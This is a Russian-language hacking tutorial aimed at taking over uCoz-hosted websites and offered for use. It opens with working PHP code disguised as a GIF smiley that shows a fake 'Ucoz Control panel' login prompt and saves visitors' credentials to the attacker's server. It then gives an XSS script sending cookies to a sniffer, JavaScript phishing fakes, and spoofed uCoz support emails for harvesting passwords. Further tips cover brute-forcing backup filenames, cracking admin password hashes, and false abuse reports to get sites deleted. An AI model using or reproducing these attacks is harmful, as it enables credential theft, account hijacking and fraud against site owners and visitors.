Итак, начнем...
Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif).
Затем откройте блокнот, да простой блокнот и напишите следующее:

header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
  Header('HTTP/1.1 401 Unauthorized');
  Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>

Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:

http://mysite.phphost.net/smile.gif

И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.

Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандрартно созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем спасибо за просмотр, надеюсь статья вам поможет =)))


Вступление

Начнём с того, что паблик уязвимостей на укозе пока не обнаружено. Это факт. Поэтому можете не насиловать Bugtraq. Укоз вообще не предоставляет возможность установки php скриптов мотивируя это тем что начинающие могут своими скриптами повредить сам укоз . Итак что мы имеем.

1) Активная XSS при включенном HTML

Если разрешено вставлять в сообщения (приватки, коменты, посты в миничате…) HTML код то пишем скрипт наподобие:
Цитата:<script>img=new Image(); img.scr =”http://сайт/путь/к/cнифферу.php?s=”+escape(document.cookie);</script>

Делаем сниффер на сайте с php (как ищите сами – сети полно самых разных php снифферов) или юзаем готовые сервисы. Теперь смотри в логи сниффа и ждём пока в них появится кука админа.
Ну во-первых по умолчанию опция вставки HTML отключена. Во-вторых если админ поставил галочку "защита от подмены куков" то вариант с куками отметается.
2) XSRF

Если можно вставлять HTML но куки защищены это не значит что всё потеряно. Можно сделать XSRF - пишешь ява скрипт, который когда на него зайдёт админ, от его имени пошлёт запрос и сделает тебя админом или хоть как-то повысит твои права. Скрипт дать не могу т.к. тут всё зависит от конкретной ситуации. Я думаю, вам не составит особого труда написать такой или спросить на форуме. Вообще разрешение на вставку HTML это очень серьёзная прореха в безопасности т.к. возможности XSS и XSRF практически ничем не ограничены и кража кук и подделка запросов это лишь простейший пример их использования.
3) Фейк

Можно ещё замутить фейк - опять же если разрешён HTML ява скриптами делаешь окошко с полем ввода пароля и ждёшь пока доверчивый админ введёт туда свои данные которые пересылаешь на сниффер. Можно так же сделать простой авто переход на заранее подготовленный фейк сайта:

Цитата:<sсriрt>document.location.href="сниффер"</sсriрt>

Но тут есть проблема – в строке адреса будет совсем другой сайт. Поэтому при создании таких фейков следует использовать сам юкос во-первых – готовыми шаблонами можно быстро содать похожий сайт, во вторых зарегать сайт с визуально похожим доменом и таким же доменом второго уровня можно лишь там.
4) Фокусы со смайлами

Отправляем жертве сообщение с вставкой:
Цитата:[ IMG ]http://сайт/путь/к/smile.gif[ /IMG ]

Где smile.gif вовсе не картинка а php сниффер, который либо крадёт куки, либо, если куки защищены, выводит форму ввода пароля. Подробности по этому методу можно прочитать здесь.

5) Имитация взлома

Уж сколько бы укоз не утверждал что он никогда не просит выслать им пароли клиентов есть обстоятельство где они от этих правил отступают. Если вы взломали сайт на укозе и его бывший админ оказался слишком настойчив в своих жалобах, то вам на мыло (то которое значится в настройках сайта) прийдет письмо такого формата:

Цитата:От кого:
UcoZ Support <abuse@ucoz.ru>
Кому:
Ваше_мыло
Дата:
Дата отправки сообщения. Обычно отсылают в рабочий день примерно в 2 часа дня.
Тема:
Re: UcoZ - Abuse Report - Нарушение, относящееся ко взлому
> -----------------------------------------------------------------
> Мой сайт на -- взломали хакеры, они сменили пароль к админ-панели и емайл. Можно ли вернуть мой сайт?
> На сайте было X (количество) админов - я, перечисление админов.
> -----------------------------------------------------------------
>
>

Какой был самый первый пароль от панели управления?
Какой был самый первый е-майл, указанный при регистрации?

--
Имя_сотрудника_укоза, веб-сервисы UcoZ.

Внимание! При ответе обязательно сохраняйте цитирование переписки.

Никто не мешает нам послать это письмо админу, подделав обратный адрес abuse@ucoz.ru и поле заголовка Reply-to: указать настоящее мыло, что бы пароли ушли к нам, а не на подделанный адрес.
Ваше_мыло - заменяете мылом жертвы, отправляете письмо в будний день ближе к обеду что бы не спалится что писмо прилшо в воскресенье ночью (IMG:style_emoticons/default/smile.gif) Имя сотрудника и текст жалобы можно придумать любым. Можно сделать фейк сайта и от имени администрации юкоса (UcoZ <noreply@ucoz.ru>) попросить туда зайти например так:

Цитата:От: UcoZ <noreply@ucoz.ru>
Кому: Мыло_жертвы
Написано: 30 февраля 2015 г., 0:34:34
Тема: UcoZ - Аккаунт отключен

Здравствуйте, Имя_админа.

Ваш сайт адрес_сайта был признан неактивным и отключен в соответствии
с Условиями использованя UcoZ.

У Вас есть 15 дней, чтобы восстановить сайт, перейдя по следующей ссылке:
-----------------------------------------------------------------
Волшебная ссылка
-----------------------------------------------------------------
В противном случае, после упомянутого срока Ваш сайт будет полностью удален.

Прочтите наши Условия использования: http://www.ucoz.net/main/?a=terms

Всего наилучшего.

Такие письма отправляются скриптом поэтому прийдётся отправлять его ночью - см дату.
6) Брутфорс и backup

Укоз позволяет сделать резервную копию сайта, правда восстановить сайт из неё можно только за деньги . Несмотря на это юзеры часто делают себе backup сайтов, толи на память, толи посмотреть, как он выгладит. Суть в то что архив находится (по крайней мере находился когда-то) по адресу --
Мало того имя архива имеет вид _bk_десятьразныхцифрибукв.zip
Как показывает практика эти 10 символов тоже не случайны вот имена backup-ов двух разных когда то существовавших сайта:
Цитата:_bk_2b81cada89.zip
_bk_2d90cada89.zip

Не сложно заметить что изменилось только 3 символа! Это даёт возможность относительно быстро подобрать путь к backup. Вполне возможно что такое положение дел уже изменилось. Укоз очень часто меняет формат содержимого backup-а, но я думаю вам не составит труда найти в нём users.txt а в нём запись типа:
Цитата:Имя_админа|$1$4/E2$.BS0ZiRl7mtENwlcpc3D31|

$1$4/E2$.BS0ZiRl7mtENwlcpc3D31 - это хеш пароля админа, по формату хеша можно сказать что это MD5(Unix) где 4/E2 – это привязка, а .BS0ZiRl7mtENwlcpc3D31 – сам хеш.
Берём PasswordsPro и пытаемся сбрутить, либо пользуемся онлайн расшифровщиками с базой предвычисленных хешей.
7) Баги Укоза

Багов не так много, но иногда встречаются пассивные XSS, например, недавно кто то на античате находил пассивку на официальном сайте юкоса. Багу кажется, прикрыли но есть все шансы что они ещё проявятся – следите за сообщениями на форумах.
8 ) Удаление

Недостаток бесплатных хостингов – ваш сайт могут закрыть при первой же жалобе, даже если ту написал Вася Пупкин. По этому в приличной форме жалуемся по адресу abuse@ucoz.ru на неугодный сайт. Говорим что там выкладывают детское говно, призывают к экстримизму и что админ вообще глава Оркаидо. Для убедительности всем выше перечисленным можно заспамить форум. Если админ не успеет почистить сайт то его с большой вероятность удалят.
9) Остальные способы.

Это и протроянивание, и угон мыла с восстановлением пароля к сайту и подбор пароля к админке и СИ.
Самый надежный способ это троян – можно угнать сайт как бы он ни был защищён, но есть проблема. Все паблик трояны палятся антивирусами, а за самопальный можно получить 7 лет.
Угон мыла – сейчас все пользуются mail.ru, yandex.ru…у которых угнать мыло не легче чем без палева свистнуть телик в магазине.
Подбор пароля – надеятся на подбор всё равно, что на ключ под ковриком. Однако шанс есть т.к. на укозе в основном регистрируются начинающие админы которые ставят слабые пароли.
СИ – тут всё зависит от того какой вы психолог. К хакерству это не имеет никакого отношения, но скажу, при хорошо постеленных предложениях можно развести и того кто уже и 3 и 4 раза покупался на эту удочку. Однако не советую.
Вывод или что тебе будет

Угнать полностью сайт на юкосе не так просто из за секретного вопроса... Даже если ты завладеешь
куками или мылом админа то твоя власть над сайтом продлиться не долго. Если конечно админ не пользуется www для чтения почты и в его почтовом ящик не остались письма с паролями или пароли совпадают. Админ сможет вернуть свой сайт благодаря ответу на секретный вопрос.
За такую мелкую пакость как угон там сайта вас никто искать не будет. Т.к. на их официальном форуме чёрным по белому написано, что в краже сайта виноваты только сами пользователи. Да и такая компания как укоз с их репутацией и рекламой скорее удавится, чем признает свою вину даже если баг есть. Даже если бывший хозяин сайта предоставит их админам бейкап сайта и пароли которые стояли ранее его пошлют, мотивируя тем что при регистрации не указывалось не каких паспортных данных, а бейкап мог сделать любой кто подобрал пароль. В лучшем случае (для админа) вам на мыло может прийти письмо от администрации юкоса которое я показал выше. Если вы не ответите на это письмо сайт всё равно не вернётся к админу – его просто удалят и заблокируют регистрацию такого домена на некоторое время.

Вот, собственно, и все.